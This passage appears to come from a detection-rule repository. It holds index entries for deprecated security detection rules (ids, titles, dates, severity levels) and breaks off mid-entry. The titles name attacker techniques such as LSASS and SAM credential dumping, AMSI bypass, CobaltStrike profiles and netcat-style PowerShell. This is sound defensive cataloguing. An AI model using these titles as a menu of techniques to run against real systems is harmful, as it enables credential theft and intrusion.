Execution,2022-01-02,2023-03-06,medium\n344482e4-a477-436c-aa70-7536d18a48c7,Execution via MSSQL Xp_cmdshell Stored Procedure,2022-09-28,2023-03-06,high\n00a4bacd-6db4-46d5-9258-a7d5ebff4003,Read and Execute a File Via Cmd.exe,2022-08-20,2023-03-07,medium\n70e68156-6571-427b-a6e9-4476a173a9b6,Cmd Stream 
Redirection,2022-02-04,2023-03-07,medium\n033fe7d6-66d1-4240-ac6b-28908009c71f,APT29,2018-12-04,2023-03-08,high\n04d9079e-3905-4b70-ad37-6bdf11304965,CrackMapExecWin,2018-04-08,2023-03-08,critical\n18739897-21b1-41da-8ee4-5b786915a676,GALLIUM Artefacts,2020-02-07,2023-03-09,high\n0eb2107b-a596-422e-b123-b389d5594ed7,Hurricane Panda Activity,2019-03-04,2023-03-10,high\n4a12fa47-c735-4032-a214-6fab5b120670,Lazarus Activity Apr21,2021-04-20,2023-03-10,high\n7454df60-1478-484b-810d-bff5d0ba6d4b,DNS Tunnel Technique from MuddyWater,2020-06-04,2023-03-10,critical\n7b49c990-4a9a-4e65-ba95-47c9cc448f6e,Lazarus Loaders,2020-12-23,2023-03-10,critical\n43f487f0-755f-4c2a-bce7-d6d2eec2fcf8,Suspicious Add Scheduled Task From User AppData Temp,2021-11-03,2023-03-14,high\nd813d662-785b-42ca-8b4a-f7457d78d5a9,Suspicious Load of Advapi31.dll,2022-02-03,2023-03-15,informational\ne74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9,Edit of .bash_profile and .bashrc,2019-05-12,2023-03-23,medium\nba2a7c80-027b-460f-92e2-57d113897dbc,App Permissions Granted For Other APIs,2022-07-28,2023-03-29,medium\n18cf6cf0-39b0-4c22-9593-e244bdc9a2d4,TA505 Dropper Load Pattern,2020-12-08,2023-04-05,critical\n2d117e49-e626-4c7c-bd1f-c3c0147774c8,Potential PowerShell Base64 Encoded Shellcode,2018-11-17,2023-04-06,medium\n635dbb88-67b3-4b41-9ea5-a3af2dd88153,Microsoft Binary Github Communication,2017-08-24,2023-04-18,high\n6c939dfa-c710-4e12-a4dd-47e1f10e68e1,Domestic Kitten FurBall Malware Pattern,2021-02-08,2023-04-20,high\n6355a919-2e97-4285-a673-74645566340d,Process Memory Dumped Via RdrLeakDiag.EXE,2022-01-04,2023-04-24,high\n9cf01b6c-e723-4841-a868-6d7f8245ca6e,Group Modification Logging,2019-03-26,2023-04-26,low\n410ad193-a728-4107-bc79-4419789fcbf8,Trickbot Malware Reconnaissance Activity,2019-12-28,2023-04-28,high\nfce5f582-cc00-41e1-941a-c6fabf0fdb8c,Suspicious PowerShell Invocations - Specific,2017-03-05,2023-05-04,high\nf016c716-754a-467f-a39e-63c06f773987,Suspicious Remote Thread 
Target,2022-08-25,2023-05-05,medium\n65d2be45-8600-4042-b4c0-577a1ff8a60e,Application Whitelisting Bypass via DLL Loaded by odbcconf.exe,2019-10-25,2023-05-22,medium\n8e2b24c9-4add-46a0-b4bb-0057b4e6187d,Regsvr32 Anomaly,2019-01-16,2023-05-26,high\nfe6e002f-f244-4278-9263-20e4b593827f,Alternate PowerShell Hosts - Image,2019-09-12,2023-06-01,low\n9e77ed63-2ecf-4c7b-b09d-640834882028,PsExec Pipes Artifacts,2020-05-10,2023-08-07,medium\n39776c99-1c7b-4ba0-b5aa-641525eee1a4,Execution via CL_Mutexverifiers.ps1,2020-10-14,2023-08-17,high\n4cd29327-685a-460e-9dac-c3ab96e549dc,Execution via CL_Invocation.ps1 - Powershell,2020-10-14,2023-08-17,high\n4e8d5fd3-c959-441f-a941-f73d0cdcdca5,Abusing Windows Telemetry For Persistence - Registry,2020-09-29,2023-08-17,high\n7c637634-c95d-4bbf-b26c-a82510874b34,Disable Microsoft Office Security Features,2021-06-08,2023-08-17,high\n8a58209c-7ae6-4027-afb0-307a78e4589a,User Account Hidden By Registry,2022-08-20,2023-08-17,high\n9b894e57-033f-46cf-b7fa-a52804181973,Office Security Settings Changed,2020-05-22,2023-08-17,high\nc81fe886-cac0-4913-a511-2822d72ff505,SilentProcessExit Monitor Registration,2021-02-26,2023-08-17,high\n0c1ffcf9-efa9-436e-ab68-23a9496ebf5b,User Added To Admin Group - MacOS,2023-03-19,2023-08-22,medium\n5b80cf53-3a46-4adc-960b-05ec19348d74,Wscript Execution from Non C Drive,2022-10-01,2023-08-29,medium\n5e3d3601-0662-4af0-b1d2-36a05e90c40a,LSASS Memory Dump File Creation,2019-10-22,2023-08-29,high\n839f1ee1-292d-495a-bf37-818267b8ee82,Vulnerable Driver Load By Name,2022-10-03,2023-09-03,low\n21b23707-60d6-41bb-96e3-0f0481b0fed9,Vulnerable Dell BIOS Update Driver Load,2021-05-05,2023-09-12,high\n7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647,Vulnerable GIGABYTE Driver Load,2022-07-25,2023-09-12,high\n7c676970-af4f-43c8-80af-ec9b49952852,Vulnerable AVAST Anti Rootkit Driver Load,2022-07-28,2023-09-12,high\n9bacc538-d1b9-4d42-862e-469eafc05a41,Vulnerable HW Driver 
Load,2022-07-26,2023-09-12,high\nac683a42-877b-4ff8-91ac-69e94b0f70b4,Vulnerable Lenovo Driver Load,2022-11-10,2023-09-12,high\n91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6,Usage Of Malicious POORTRY Signed Driver,2022-12-16,2023-09-13,high\nd7825193-b70a-48a4-b992-8b5b3015cc11,Windows Update Client LOLBIN,2020-10-17,2023-11-11,high\nca83e9f3-657a-45d0-88d6-c1ac280caf53,New Service Uses Double Ampersand in Path,2022-07-05,2023-11-15,high\nfe34868f-6e0e-4882-81f6-c43aa8f15b62,Windows Defender Threat Detection Disabled,2020-07-28,2023-11-22,high\n32d0d3e2-e58d-4d41-926b-18b520b2b32d,Credential Dumping Tools Accessing LSASS Memory,2017-02-16,2023-11-30,high\na122ac13-daf8-4175-83a2-72c387be339d,Security Event Log Cleared,2021-08-15,2023-12-06,medium\n0332a266-b584-47b4-933d-a00b103e1b37,Suspicious Get-WmiObject,2022-01-12,2023-12-11,low\n46deb5e1-28c9-4905-b2df-51cdcc9e6073,PowerShell Scripts Run by a Services,2020-10-06,2023-12-11,high\nd23f2ba5-9da0-4463-8908-8ee47f614bb9,Powershell File and Directory Discovery,2021-12-15,2023-12-11,low\ndf5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2,Credential Dumping Tools Service Execution,2017-03-05,2023-12-11,critical\n602a1f13-c640-4d73-b053-be9a2fa58b77,Svchost DLL Search Order Hijack,2019-10-28,2024-01-10,high\n839dd1e8-eda8-4834-8145-01beeee33acd,SAM Dump to AppData,2018-01-27,2024-01-18,high\ne32ce4f5-46c6-4c47-ba69-5de3c9193cd7,Possible Process Hollowing Image Loading,2018-01-07,2024-01-22,high\na6d67db4-6220-436d-8afc-f3842fe05d43,Dnscat Execution,2019-10-24,2024-01-25,critical\nd7b09985-95a3-44be-8450-b6eadf49833e,Suspicious Non-Browser Network Communication With Reddit API,2023-02-16,2024-02-02,medium\n37325383-740a-403d-b1a2-b2b4ab7992e7,CobaltStrike Malleable (OCSP) Profile,2019-11-12,2024-02-15,high\n41b42a36-f62c-4c34-bd40-8cb804a34ad8,CobaltStrike Malformed UAs in Malleable Profiles,2021-05-06,2024-02-15,critical\n953b895e-5cc9-454b-b183-7f3db555452e,CobaltStrike Malleable Amazon Browsing Traffic 
Profile,2019-11-12,2024-02-15,high\nc9b33401-cc6a-4cf6-83bb-57ddcb2407fc,CobaltStrike Malleable OneDrive Browsing Traffic Profile,2019-11-12,2024-02-15,high\n73fcad2e-ff14-4c38-b11d-4172c8ac86c7,Suspicious Rundll32 Script in CommandLine,2021-12-04,2024-02-23,medium\n9f06447a-a33a-4cbe-a94f-a3f43184a7a3,Rundll32 JS RunHTMLApplication Pattern,2022-01-14,2024-02-23,high\ne06ac91d-b9e6-443d-8e5b-af749e7aa6b6,iOS Implant URL Pattern,2019-08-30,2024-02-26,critical\n628d7a0b-7b84-4466-8552-e6138bc03b43,Suspicious Epmap Connection,2022-07-14,2024-03-01,high\n9433ff9c-5d3f-4269-99f8-95fc826ea489,CrackMapExec File Creation Patterns,2022-03-12,2024-03-01,high\nc625c4c2-515d-407f-8bb6-456f65955669,Service Binary in Uncommon Folder,2022-05-02,2024-03-25,medium\n42f0e038-767e-4b85-9d96-2c6335bad0b5,Adwind RAT / JRAT - Registry,2017-11-10,2024-03-26,high\n5039f3d2-406a-4c1a-9350-7a5a85dc84c2,Search-ms and WebDAV Suspicious Indicators in URL,2023-08-21,2024-05-10,high\nb916cba1-b38a-42da-9223-17114d846fd6,Potential NT API Stub Patching,2023-01-07,2024-05-27,medium\n3d968d17-ffa4-4bc0-bfdc-f139de76ce77,Potential Persistence Via COM Hijacking From Suspicious Locations,2022-07-28,2024-07-16,high\n1a3d42dd-3763-46b9-8025-b5f17f340dfb,Suspicious Unattend.xml File Access,2021-12-19,2024-07-22,medium\n6902955a-01b7-432c-b32a-6f5f81d8f624,Suspicious File Event With Teams Objects,2022-09-16,2024-07-22,high\na0ff33d8-79e4-4cef-b4f3-9dc4133ccd12,Potential Persistence Via COM Search Order Hijacking,2020-04-14,2024-09-02,medium\na33f8808-2812-4373-ae95-8cfb82134978,Windows Defender Exclusion Deleted,2019-10-26,2025-01-30,medium\ne17121b4-ef2a-4418-8a59-12fb1631fa9e,Delete Volume Shadow Copies via WMI with PowerShell - PS Script,2021-12-26,2025-05-20,high\n6e897651-f157-4d8f-aaeb-df8151488385,PowerShell Web Download,2022-03-24,2025-07-18,medium\nf748c45a-f8d3-4e6f-b617-fe176f695b8f,.RDP File Created by Outlook Process,2024-11-01,2025-07-22,high\na2a3b925-7bb0-433b-b508-db9003263cc4,Active 
Directory Parsing DLL Loaded Via Office Application,2020-02-19,2025-10-17,medium\ncdeef967-f9a1-4375-90ee-6978c5f23974,Azure Application Credential Modified,2021-09-02,2025-10-17,medium\n8f70ac5f-1f6f-4f8e-b454-db19561216c5,PowerShell DownloadFile,2020-08-28,2025-10-20,high\ne28a5a99-da44-436d-b7a0-2afc20a5f413,Whoami Utility Execution,2018-08-13,2025-10-20,low\n7417e29e-c2e7-4cf6-a2e8-767228c64837,Active Directory Kerberos DLL Loaded Via Office Application,2020-02-19,2025-10-22,medium\n879c3015-c88b-4782-93d7-07adf92dbcb7,Space After Filename,2020-06-17,2025-11-22,low\ne710a880-1f18-4417-b6a0-b5afdf7e305a,Atomic MacOS Stealer - FileGrabber Infostealer Execution,2025-09-12,2025-11-22,high\n4be03877-d5b6-4520-85c9-a5911c0a656c,FileFix - Suspicious Child Process from Browser File Upload Abuse,2025-06-26,2025-11-24,high\n6e30c82f-a9f8-4aab-b79c-7c12bce6f248,File Download Via Bitsadmin To An Uncommon Target Folder,2022-06-28,2025-12-10,medium\n"
  },
  {
    "path": "deprecated/deprecated.json",
    "content": "[\n    {\n        \"id\": \"867613fb-fa60-4497-a017-a82df74a172c\",\n        \"title\": \"PowerShell Execution\",\n        \"date\": \"2019-09-12\",\n        \"modified\": \"2021-11-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"0d894093-71bc-43c3-8c4d-ecfc28dcf5d9\",\n        \"title\": \"Mimikatz Detection LSASS Access\",\n        \"date\": \"2017-10-18\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"3d304fda-78aa-43ed-975c-d740798a49c1\",\n        \"title\": \"Suspicious PowerShell Invocations - Generic\",\n        \"date\": \"2017-03-12\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"56a8189f-11b2-48c8-8ca7-c54b03c2fbf7\",\n        \"title\": \"Suspicious Esentutl Use\",\n        \"date\": \"2020-05-23\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"65531a81-a694-4e31-ae04-f8ba5bc33759\",\n        \"title\": \"Suspicious PowerShell Download\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"9f7aa113-9da6-4a8d-907c-5f1a4b908299\",\n        \"title\": \"SyncAppvPublishingServer Execution to Bypass Powershell Restriction\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a0d63692-a531-4912-ad39-4393325b2a9c\",\n        \"title\": \"RClone Execution\",\n        \"date\": \"2021-05-10\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"b932b60f-fdda-4d53-8eda-a170c1d97bbd\",\n        \"title\": \"Activity Related to NTDS.dit Domain Hash Retrieval\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"cb7286ba-f207-44ab-b9e6-760d82b84253\",\n     
   \"title\": \"Rclone Execution via Command Line or PowerShell\",\n        \"date\": \"2021-05-26\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fde7929d-8beb-4a4c-b922-be9974671667\",\n        \"title\": \"SyncAppvPublishingServer Execution to Bypass Powershell Restriction\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"17f878b8-9968-4578-b814-c4217fc5768c\",\n        \"title\": \"Autorun Keys Modification\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"29d31aee-30f4-4006-85a9-a4a02d65306c\",\n        \"title\": \"Lateral Movement Indicator ConDrv\",\n        \"date\": \"2021-04-27\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"98f4c75c-3089-44f3-b733-b327b9cd9c9d\",\n        \"title\": \"Accessing Encrypted Credentials from Google Chrome Login Database\",\n        \"date\": \"2021-12-20\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a457f232-7df9-491d-898f-b5aabd2cbe2f\",\n        \"title\": \"Windows Management Instrumentation DLL Loaded Via Microsoft Word\",\n        \"date\": \"2019-12-26\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"informational\"\n    },\n    {\n        \"id\": \"db2110f3-479d-42a6-94fb-d35bc1e46492\",\n        \"title\": \"CreateMiniDump Hacktool\",\n        \"date\": \"2019-12-22\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"2621b3a6-3840-4810-ac14-a02426086171\",\n        \"title\": \"Winword.exe Loads Suspicious DLL\",\n        \"date\": \"2020-10-09\",\n        \"modified\": \"2022-07-25\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bf6c39fc-e203-45b9-9538-05397c1b4f3f\",\n        
\"title\": \"Abusing Findstr for Defense Evasion\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-10-12\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719\",\n        \"title\": \"Possible Applocker Bypass\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2022-11-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"dca91cfd-d7ab-4c66-8da7-ee57d487b35b\",\n        \"title\": \"Process Start From Suspicious Folder\",\n        \"date\": \"2022-02-11\",\n        \"modified\": \"2022-11-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"53c7cca0-2901-493a-95db-d00d6fcf0a37\",\n        \"title\": \"Brute Force\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2022-11-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5f113a8f-8b61-41ca-b90f-d374fa7e4a39\",\n        \"title\": \"Suspicious In-Memory Module Execution\",\n        \"date\": \"2019-10-27\",\n        \"modified\": \"2022-11-17\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"f67dbfce-93bc-440d-86ad-a95ae8858c90\",\n        \"title\": \"Suspicious Bitsadmin Job via PowerShell\",\n        \"date\": \"2018-10-30\",\n        \"modified\": \"2022-11-21\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9d1c72f5-43f0-4da5-9320-648cf2099dd0\",\n        \"title\": \"Excel Proxy Executing Regsvr32 With Payload\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2022-12-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c0e1c3d5-4381-4f18-8145-2583f06a1fe5\",\n        \"title\": \"Excel Proxy Executing Regsvr32 With Payload Alternate\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2022-12-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"72671447-4352-4413-bb91-b85569687135\",\n        \"title\": \"Nslookup PwSh Download Cradle\",\n        \"date\": \"2022-09-06\",\n        
\"modified\": \"2022-12-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3f07b9d1-2082-4c56-9277-613a621983cc\",\n        \"title\": \"Accessing WinAPI in PowerShell for Credentials Dumping\",\n        \"date\": \"2020-10-06\",\n        \"modified\": \"2022-12-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e554f142-5cf3-4e55-ace9-a1b59e0def65\",\n        \"title\": \"DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon\",\n        \"date\": \"2020-10-12\",\n        \"modified\": \"2022-12-18\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"17eb8e57-9983-420d-ad8a-2c4976c22eb8\",\n        \"title\": \"MavInject Process Injection\",\n        \"date\": \"2018-12-12\",\n        \"modified\": \"2022-12-19\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"36c5146c-d127-4f85-8e21-01bf62355d5a\",\n        \"title\": \"Invoke-Obfuscation Via Use Rundll32\",\n        \"date\": \"2019-10-08\",\n        \"modified\": \"2022-12-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6d3f1399-a81c-4409-aff3-1ecfe9330baf\",\n        \"title\": \"PrintNightmare Powershell Exploitation\",\n        \"date\": \"2021-08-09\",\n        \"modified\": \"2023-01-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"83083ac6-1816-4e76-97d7-59af9a9ae46e\",\n        \"title\": \"AzureHound PowerShell Commands\",\n        \"date\": \"2021-10-23\",\n        \"modified\": \"2023-01-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a85cf4e3-56ee-4e79-adeb-789f8fb209a8\",\n        \"title\": \"Indirect Command Exectuion via Forfiles\",\n        \"date\": \"2022-10-17\",\n        \"modified\": \"2023-01-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fa47597e-90e9-41cd-ab72-c3b74cfb0d02\",\n        \"title\": \"Indirect Command Execution\",\n        \"date\": \"2019-10-24\",\n        \"modified\": \"2023-01-04\",\n        \"level\": 
\"low\"\n    },\n    {\n        \"id\": \"e4b63079-6198-405c-abd7-3fe8b0ce3263\",\n        \"title\": \"Suspicious CLR Logs Creation\",\n        \"date\": \"2020-10-12\",\n        \"modified\": \"2023-01-05\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"cd5c8085-4070-4e22-908d-a5b3342deb74\",\n        \"title\": \"Suspicious Bitstransfer via PowerShell\",\n        \"date\": \"2021-08-19\",\n        \"modified\": \"2023-01-10\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20\",\n        \"title\": \"Renamed PowerShell\",\n        \"date\": \"2019-08-22\",\n        \"modified\": \"2023-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2\",\n        \"title\": \"Renamed Rundll32.exe Execution\",\n        \"date\": \"2022-06-08\",\n        \"modified\": \"2023-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e31f89f7-36fb-4697-8ab6-48823708353b\",\n        \"title\": \"Suspicious Cmd Execution via WMI\",\n        \"date\": \"2022-09-27\",\n        \"modified\": \"2023-01-19\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\",\n        \"title\": \"Netcat The Powershell Version - PowerShell Module\",\n        \"date\": \"2021-07-21\",\n        \"modified\": \"2023-01-20\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"47688f1b-9f51-4656-b013-3cc49a166a36\",\n        \"title\": \"Base64 Encoded Listing of Shadowcopy\",\n        \"date\": \"2022-03-01\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"5b572dcf-254b-425c-a8c5-d9af6bea35a6\",\n        \"title\": \"Potential Xor Encoded PowerShell Command\",\n        \"date\": \"2022-07-06\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fd6e2919-3936-40c9-99db-0aa922c356f7\",\n        
\"title\": \"Malicious Base64 Encoded Powershell Invoke Cmdlets\",\n        \"date\": \"2022-05-31\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"eeb66bbb-3dde-4582-815a-584aee9fe6d1\",\n        \"title\": \"Correct Execution of Nltest.exe\",\n        \"date\": \"2021-10-04\",\n        \"modified\": \"2023-02-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0acaad27-9f02-4136-a243-c357202edd74\",\n        \"title\": \"Ryuk Ransomware Command Line Activity\",\n        \"date\": \"2019-08-06\",\n        \"modified\": \"2023-02-03\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"4f927692-68b5-4267-871b-073c45f4f6fe\",\n        \"title\": \"PowerShell AMSI Bypass Pattern\",\n        \"date\": \"2022-11-04\",\n        \"modified\": \"2023-02-03\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\",\n        \"title\": \"Registry Dump of SAM Creds and Secrets\",\n        \"date\": \"2022-01-05\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"04f5363a-6bca-42ff-be70-0d28bf629ead\",\n        \"title\": \"Office Applications Spawning Wmi Cli Alternate\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"23daeb52-e6eb-493c-8607-c4f0246cb7d8\",\n        \"title\": \"New Lolbin Process by Office Applications\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"518643ba-7d9c-4fa5-9f37-baed36059f6a\",\n        \"title\": \"WMI Execution Via Office Process\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"77815820-246c-47b8-9741-e0def3f57308\",\n        \"title\": \"Domain Trust Discovery\",\n        \"date\": 
\"2019-10-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\",\n        \"title\": \"Credential Acquisition via Registry Hive Dumping\",\n        \"date\": \"2022-10-04\",\n        \"modified\": \"2023-02-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6545ce61-a1bd-4119-b9be-fcbee42c0cf3\",\n        \"title\": \"Execute MSDT.EXE Using Diagcab File\",\n        \"date\": \"2022-06-09\",\n        \"modified\": \"2023-02-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9841b233-8df8-4ad7-9133-b0b4402a9014\",\n        \"title\": \"Sysinternals SDelete Registry Keys\",\n        \"date\": \"2020-05-02\",\n        \"modified\": \"2023-02-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"09af397b-c5eb-4811-b2bb-08b3de464ebf\",\n        \"title\": \"WMI Reconnaissance List Remote Services\",\n        \"date\": \"2022-01-01\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"7b0666ad-3e38-4e3d-9bab-78b06de85f7b\",\n        \"title\": \"Renamed PaExec Execution\",\n        \"date\": \"2019-04-17\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bc3cc333-48b9-467a-9d1f-d44ee594ef48\",\n        \"title\": \"SCM DLL Sideload\",\n        \"date\": \"2022-12-01\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"e42af9df-d90b-4306-b7fb-05c863847ebd\",\n        \"title\": \"WMI Remote Command Execution\",\n        \"date\": \"2022-03-13\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fa4b21c9-0057-4493-b289-2556416ae4d7\",\n        \"title\": \"Squirrel Lolbin\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": 
\"e011a729-98a6-4139-b5c4-bf6f6dd8239a\",\n        \"title\": \"Suspicious Certutil Command Usage\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2023-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"034affe8-6170-11ec-844f-0f78aa0c4d66\",\n        \"title\": \"Mimikatz MemSSP Default Log File Creation\",\n        \"date\": \"2021-12-20\",\n        \"modified\": \"2023-02-16\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"7fe71fc9-de3b-432a-8d57-8c809efc10ab\",\n        \"title\": \"New Service Creation\",\n        \"date\": \"2019-10-21\",\n        \"modified\": \"2023-02-20\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"056a7ee1-4853-4e67-86a0-3fd9ceed7555\",\n        \"title\": \"Invoke-Obfuscation RUNDLL LAUNCHER\",\n        \"date\": \"2020-10-18\",\n        \"modified\": \"2023-02-21\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3ede524d-21cc-472d-a3ce-d21b568d8db7\",\n        \"title\": \"PsExec Service Start\",\n        \"date\": \"2018-03-13\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"80167ada-7a12-41ed-b8e9-aa47195c66a1\",\n        \"title\": \"Run Whoami as SYSTEM\",\n        \"date\": \"2019-10-23\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\",\n        \"title\": \"PsExec Tool Execution\",\n        \"date\": \"2017-06-12\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"2c0d2d7b-30d6-4d14-9751-7b9113042ab9\",\n        \"title\": \"Suspicious Characters in CommandLine\",\n        \"date\": \"2022-04-27\",\n        \"modified\": \"2023-03-03\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\",\n        \"title\": \"Stop Or Remove Antivirus Service\",\n        \"date\": \"2021-07-07\",\n        
\"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\",\n        \"title\": \"Suspicious Execution of Sc to Delete AV Services\",\n        \"date\": \"2022-08-01\",\n        \"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2\",\n        \"title\": \"Renamed PsExec\",\n        \"date\": \"2019-05-21\",\n        \"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"1a70042a-6622-4a2b-8958-267625349abf\",\n        \"title\": \"Run from a Zip File\",\n        \"date\": \"2021-12-26\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"46591fae-7a4c-46ea-aec3-dff5e6d785dc\",\n        \"title\": \"Root Certificate Installed\",\n        \"date\": \"2020-10-10\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"eb87818d-db5d-49cc-a987-d5da331fbd90\",\n        \"title\": \"Stop Windows Service\",\n        \"date\": \"2019-10-23\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"23250293-eed5-4c39-b57a-841c8933a57d\",\n        \"title\": \"Visual Basic Script Execution\",\n        \"date\": \"2022-01-02\",\n        \"modified\": \"2023-03-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"344482e4-a477-436c-aa70-7536d18a48c7\",\n        \"title\": \"Execution via MSSQL Xp_cmdshell Stored Procedure\",\n        \"date\": \"2022-09-28\",\n        \"modified\": \"2023-03-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"00a4bacd-6db4-46d5-9258-a7d5ebff4003\",\n        \"title\": \"Read and Execute a File Via Cmd.exe\",\n        \"date\": \"2022-08-20\",\n        \"modified\": \"2023-03-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": 
